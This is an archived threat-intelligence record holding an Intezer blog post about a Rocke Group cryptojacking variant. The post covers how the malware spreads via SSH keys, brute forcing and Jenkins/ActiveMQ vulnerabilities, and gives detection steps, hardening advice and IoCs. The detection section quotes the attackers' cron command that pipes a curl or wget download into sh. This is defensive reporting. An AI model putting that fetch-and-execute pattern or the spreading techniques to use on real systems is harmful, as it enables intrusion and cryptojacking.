{ "id": "9c7be8e2-7dc9-4a76-a2cb-7f69b1d560cd", "created_at": "2026-04-06T00:13:33.220949Z", "updated_at": "2026-04-10T03:34:57.692731Z", "deleted_at": null, "sha1_hash": "9d59d6eb3c440d2db6aaff4af2486d29e6d6dcc9", "title": "Rocke Group Actively Targeting the Cloud: Wants Your SSH Keys", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 63688, "plain_text": "Rocke Group Actively Targeting the Cloud: Wants Your SSH Keys\r\nBy Nicole Fishbein\r\nPublished: 2021-04-06 · Archived: 2026-04-05 19:50:30 UTC\r\nNew Malware Variant Exploits Production Environment\r\nRocke Group is a Chinese-based threat actor most known for running cryptojacking malware on Linux machines.\r\nThe group has been active since 2018 and continues to evolve by modifying its tools and techniques to stay\r\nevasive. In 2019, we reported that Rocke Group was competing with Pacha Group for cryptomining positioning\r\non Linux-based servers in the cloud.\r\nWe have found a new malware variant developed by Rocke Group, that infects other machines in the network\r\nusing saved SSH keys and weak passwords. It also exploits vulnerabilities in popular platforms and services such\r\nas Jenkins, Redis and ActiveMQ. Once the victim is infected a Monero cryptominer is executed. Below we\r\npresent our findings with instructions on how to check if your system has been compromised, as well as how to\r\nprotect your cloud environments against future Rocke Group attacks.\r\nCapabilities and Findings on Rocke Group Malware\r\nThe malware that is initially delivered to the victim’s server is packed with a modified UPX which can make it\r\nharder for some Endpoint Detection and Response (EDR) products to detect the malicious code. This threat\r\ncontains a number of modules that are stored in a compressed form inside the malware, and during the execution\r\nthe payloads are extracted and executed.\r\nRocke Group uses a new script that downloads malware from a hosting server and executes it. The malware then\r\nuses public SSH keys, which are saved in a file called “known_hosts” on the victim’s Linux machine, to infect\r\nother machines on the network.\r\nThe malware archives persistence using a scheduled task in crontab and bashrc files. It creates a service that\r\ncontrols the execution of the malware and configures it to be executed on startup. The payload of the service is\r\nextracted from within the Rocke Group sample.\r\nNext, the malware attempts to spread in the network by brute forcing SSH, Redis and Jenkins with weak\r\npasswords. Then, it exploits vulnerabilities. For Jenkins it uses two vulnerabilities for executing code (CVE-2018-\r\n1000861, CVE-2019-1003000) and for ActiveMQ it tries to do an arbitrary file writing (CVE-2016-3088).\r\nTo hide the activity of the malware, it implements an evasion technique that uses library hijacking. This way the\r\ninformation retrieved by system commands is altered in a way that hides resources used by the malware and its\r\ncomponents. For instance, running the ‘top’ command will not show the high CPU usage caused by the\r\ncryptomining malware.\r\nhttps://www.intezer.com/blog/cloud-security/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/\r\nPage 1 of 4\n\nOne of the compressed modules is an XMRig Miner. Before the miner is executed the dropper kills any other\r\nprocess that uses more than 30% of the cloud server’s CPU, this way the cryptominer will have all of the CPU for\r\nitself.\r\nDetection and Response\r\nDetect if a machine in your system has been compromised by following all of these steps:\r\n1. 1. The malware creates files in the following directories:\r\n/usr/local/sbin\r\n/usr/local/bin\r\n/usr/bin\r\n/usr/libexec\r\n/tmp\r\nCheck if there are suspicious files in these locations. This campaign is known for using similar names to valid\r\nLinux services and file names such as “kerberods”, so pay attention to the files you see in these directories. In\r\nother cases, it uses file names like: 6ff4ba5d0de4498. In addition, the malware changes the timestamps of files\r\ncreated during the attack so that they appear older. You should not rely on the creation/modification time of the\r\nfiles. Response: Remove the malicious files MITRE Technique: Masquerading (T1036)\r\n1. 1. Check if there is a service that listens on port 61131 for incoming connections. Use the command:\r\nnetstat -tupln\r\nResponse: Find the PID of the process and kill it. Run the following command to get the PID: netstat -ltnp | grep -\r\nw ‘:61131’ and then: sudo kill -9 \u003cPID\u003e to kill the process.\r\n1. 1. Check if you have a service called sshservice.service. You can do this by running: systemctl status\r\nsshservice.service\r\nResponse: Stop and remove the service by running these commands:\r\nsystemctl stop [servicename] systemctl disable [servicename] rm /etc/systemd/system/[servicename] rm\r\n/etc/systemd/system/[servicename] rm /usr/lib/systemd/system/[servicename] rm\r\n/usr/lib/systemd/system/[servicename] systemctl daemon-reload systemctl reset-failed\r\nMITRE Technique: Create System Process (T1543) and Masquerading (T1036)\r\n1. 1. Check if the cron jobs include commands in the following format: */15 * * * * (curl -fsSL -m180\r\n||wget -q -T180 -O- )|shCheck the following location of scheduled jobs:\r\n/var/spool/cron/root\r\n/var/spool/cron/crontabs/root\r\n/etc/cron.d/root\r\nResponse: Delete these commands from the crontab MITRE Technique: Scheduled\r\nTask/Job (T1053)\r\n2. Check that /etc/bashrc contains commands in the same format as the crontab files\r\nhttps://www.intezer.com/blog/cloud-security/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/\r\nPage 2 of 4\n\nResponse: Delete the commands from the file MITRE Technique: Event Triggered Execution using .bashrc file\r\n(T1546)\r\n1. 1. This campaign uses DNS over HTTPs (DoH) to obtain the address of the C2 server using hard-coded domains that send back an encrypted DNS record. Inspect your network traffic for anomalies\r\nin HTTPs packages. Check if your machine tried to access one (or more) of the following domains:\r\nUpdate.iap5u1rbety6vifaxsi9vovnc9jjay2l[.]com\r\ncloudflare-dns[.]com\r\nMITRE Technique: Protocol Tunneling (T1572) and Encrypted Channel (T1573)\r\n1. 1. The malware tries to infect other machines in the network by brute forcing weak passwords and\r\nexploiting vulnerabilities in Jenkins, Redis, SSH and ActiveMQ. Follow all of the steps above for\r\nmachines that have these services.\r\nMITRE Technique: Network Service Scanning (T1046)\r\nTTPs now available in Intezer. Speed up malware analysis with relevant insights to understand how malware\r\nbehaves.\r\nBe Proactive\r\nUse strong passwords for SSH, Jenkins and Redis services. It is also highly recommended to use TLS\r\nauthentication.\r\nUse different passwords and authentication keys for each machine in the network.\r\nMake sure that your Jenkins and ActiveMQ services have the latest updates.\r\nRestrict access to services and machines, and give only the required permissions for each user.\r\nFilter network traffic to untrusted or known bad domains.\r\nApply detection of anomalies in the networks to detect suspicious communication that digresses from the\r\nusual traffic.\r\nRuntime Protection is a Must\r\nThis attack is sophisticated in that it implements evasion techniques making detection much harder. It also spreads\r\nto other services and machines on the network making it harder to respond to. Runtime protection gives you\r\nimmediate visibility over all code running in your systems and alerts you whenever unauthorized code is executed.\r\nSo, if Rocke Group attacks an environment with runtime protection, the user would immediately get an alert on all\r\ninfected machines with the ability to terminate the malicious processes. While there are dozens of cloud attack\r\nvectors that threat actors can utilize, such as software vulnerabilities and misconfigurations, eventually all\r\nattackers must run code or commands in the production environment to conduct any damage. Consider that it’s not\r\nrealistic to be able to close all attack vectors. Not only does it take time to fix vulnerabilities, but there are always\r\nattack vectors that are practically impossible to prevent such as supply chain or unknown vulnerabilities. Recent\r\nattacks have shown that Linux cryptominers and other threats will find their way into the production environment\r\nno matter how hard you work to reduce the attack surface. Runtime protection is a necessary last line of defense as\r\nactors like Rocke Group remain active.\r\nhttps://www.intezer.com/blog/cloud-security/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/\r\nPage 3 of 4\n\nIoCs\r\nDropper Script\r\nF947e69f9f8d113fb9fba3e795827110ee17feb310b54a7f7b6672a5386a3de2\r\nMalware\r\nFe27d4a8a5f299b0b25d10816e98cef2852af6dc3541bf25a77960b1573ca61d\r\nMining Pool\r\nminexmr[.]com pool\r\nXMRig Miner\r\n398e3608455dbea2cba8e9944d9b43cbb0982b48b2882fe54adf937a7a62d9e2\r\nDomains Used to Download the Malware\r\nimg[.]sobot.com cdn[.]xiaoduoai.com https://user-images[.]githubusercontent.com\r\nDomains Used for Resolving the C2 Address\r\nUpdate.iap5u1rbety6vifaxsi9vovnc9jjay2l[.]com cloudflare-dns[.]com\r\nThanks to Joakim Kennedy for contributing to this post.\r\nSource: https://www.intezer.com/blog/cloud-security/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/\r\nhttps://www.intezer.com/blog/cloud-security/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.intezer.com/blog/cloud-security/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/" ], "report_names": [ "rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys" ], "threat_actors": [ { "id": "7c053836-8f50-4d40-bc5c-7088967e1b57", "created_at": "2022-10-25T16:07:24.549525Z", "updated_at": "2026-04-10T02:00:05.03048Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Aged Libra", "G0106", "Iron Group", "Rocke" ], "source_name": "ETDA:Rocke", "tools": [ "Godlua", "Kerberods", "LSD", "Pro-Ocean", "Xbash" ], "source_id": "ETDA", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "18bcbaa6-8e7b-43c4-9db7-8b0b315ee5a3", "created_at": "2023-01-06T13:46:39.024086Z", "updated_at": "2026-04-10T02:00:03.184974Z", "deleted_at": null, "main_name": "Pacha Group", "aliases": [], "source_name": "MISPGALAXY:Pacha Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "905eabd9-2b7f-483d-86bd-0c72f96b4162", "created_at": "2023-01-06T13:46:39.02749Z", "updated_at": "2026-04-10T02:00:03.185957Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Aged Libra" ], "source_name": "MISPGALAXY:Rocke", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0b02af5f-2027-42b7-a6f2-51e2fd49ba7f", "created_at": "2022-10-25T15:50:23.360509Z", "updated_at": "2026-04-10T02:00:05.337702Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Rocke" ], "source_name": "MITRE:Rocke", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "484c5fed-029e-4504-b75a-bbdbc9460595", "created_at": "2022-10-25T16:07:24.529893Z", "updated_at": "2026-04-10T02:00:05.02425Z", "deleted_at": null, "main_name": "Pacha Group", "aliases": [], "source_name": "ETDA:Pacha Group", "tools": [ "Antd", "DDG", "GreedyAntd", "Korkerds", "XMRig" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434413, "ts_updated_at": 1775792097, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9d59d6eb3c440d2db6aaff4af2486d29e6d6dcc9.pdf", "text": "https://archive.orkl.eu/9d59d6eb3c440d2db6aaff4af2486d29e6d6dcc9.txt", "img": "https://archive.orkl.eu/9d59d6eb3c440d2db6aaff4af2486d29e6d6dcc9.jpg" } }